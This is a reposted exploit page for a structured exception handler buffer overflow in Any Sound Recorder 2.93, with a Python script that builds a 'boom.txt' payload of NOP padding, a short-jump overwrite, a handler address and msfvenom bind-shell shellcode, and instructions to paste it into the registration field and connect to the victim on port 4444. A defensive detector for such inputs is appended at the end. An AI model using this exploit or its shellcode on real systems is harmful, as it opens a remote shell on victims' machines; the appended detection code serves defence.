Any Sound Recorder 2.93 Buffer Overflow
Source: vfocus.net  Author: Abdullah  Published: 2018-10-18
# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
# Exploit Author: Abdullah Alic
# Discovery Date: 2018-10-16
# Homepage: http://www.any-sound-recorder.com
# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: 2.93 
# Tested on: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the Python exploit script; it will create a new file
# named "boom.txt". Copy the content of "boom.txt".
# Start Any Sound Recorder 2.93, click "Enter Key Code", paste the content into the "User Name" field, and click "Register".
# Connect to the victim machine on port 4444.
 
#!/usr/bin/python 
 
#Payload size: 355 bytes
#msfvenom -p windows/shell_bind_tcp  -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7"
buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6"
buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b"
buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92"
buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b"
buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85"
buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d"
buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07"
buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0"
buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08"
buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d"
buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26"
buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e"
buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce"
buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d"
buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82"
buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80"
buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9"
buf += "\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19"
buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54"
buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4"
buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05"
buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f"
buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a"
buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b"
buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62"
buf += "\x98\x86\x36\xa7"
 
junk = 10000
nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes 
seh= "\x35\x2f\xd1\x72"  # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c  FROM msacm32.drv
 
buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf))
payload = buffer
 
#badchars \x00 \x0a \x0d
 
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
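
A triage check for inputs shaped like the "boom.txt" this script writes, given here as an added example that is not part of the original exploit or of the vendor's code. It flags an oversized name-field value that contains a NOP sled or a short-jump nSEH filler followed by a 4-byte handler pointer. The 256-byte limit, the 32-byte sled threshold and both samples are assumptions constructed for illustration.

```python
import re

# Short-jump opcode (EB xx) padded with two NOPs: the nSEH filler used in the
# script above ("\xeb\x06\x90\x90"), generalised to any forward offset.
NSEH_JMP = re.compile(rb"\xeb[\x04-\x7f]\x90\x90")
NOP_SLED = re.compile(rb"\x90{32,}")   # sled threshold is an assumption
MAX_NAME_LEN = 256                     # assumed sane limit for a "User Name" field
BAD_CHARS = {0x00, 0x0A, 0x0D}         # bad characters listed on the page


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII; a real name is close to 1.0."""
    if not data:
        return 1.0
    return sum(1 for b in data if 0x20 <= b < 0x7F) / len(data)


def triage(data: bytes) -> dict:
    """Return indicators of an SEH-overwrite style blob in a text-field value."""
    sled = NOP_SLED.search(data)
    findings = {
        "oversized": len(data) > MAX_NAME_LEN,
        "nop_sled_offset": sled.start() if sled else None,
        "nseh_offsets": [],
        "printable_ratio": round(printable_ratio(data), 3),
    }
    for m in NSEH_JMP.finditer(data):
        handler = data[m.end():m.end() + 4]
        # The page lists 00 0a 0d as bad characters, so a usable handler
        # pointer after the filler contains none of them.
        if len(handler) == 4 and not set(handler) & BAD_CHARS:
            findings["nseh_offsets"].append(m.start())
    findings["suspicious"] = findings["oversized"] and (
        bool(findings["nseh_offsets"]) or findings["nop_sled_offset"] is not None
    )
    return findings


# Constructed samples: inert filler and a dummy pointer only, no shellcode.
SAMPLE_BAD = b"\x90" * 900 + b"\xeb\x06\x90\x90" + b"ABCD" + b"\x90" * 9000
SAMPLE_OK = b"Jane Doe"

if __name__ == "__main__":
    print(triage(SAMPLE_BAD))
    print(triage(SAMPLE_OK))
```

The oversized check alone is the strongest signal here; the byte patterns help distinguish a deliberate overflow attempt from an accidental long paste.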



 